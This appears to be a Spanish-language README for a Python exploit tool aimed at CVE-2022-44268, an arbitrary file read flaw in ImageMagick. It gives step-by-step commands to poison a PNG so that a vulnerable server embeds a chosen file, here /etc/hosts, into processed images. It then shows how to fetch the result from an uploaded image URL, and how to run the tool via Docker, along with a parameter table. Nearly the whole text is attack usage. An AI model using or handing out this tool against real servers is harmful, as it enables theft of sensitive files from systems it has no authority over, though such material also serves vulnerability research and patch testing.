
Exploit basado en Python para CVE-2022-44268, una vulnerabilidad de lectura arbitraria de archivos en ImageMagick. Envenena imágenes PNG para leer archivos sensibles de hosts vulnerables a través de la subida web.
CVE-2022-44268 Lectura Arbitraria de Archivos en ImageMagick
Envenenar la imagen ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Subir la imagen PNG envenenada.
Verificar si el exploit fue exitoso 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Construir
docker build -t cve-2022-44268 .
Ejecutar
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Parámetro | Descripción | Tipo |
|---|---|---|
| --url | La URL de la imagen PNG subida | String |
| --image | Archivo PNG de entrada | File |
| --output | Archivo PNG de salida | File |
| --file-to-read | Archivo a leer del servidor vulnerable | String |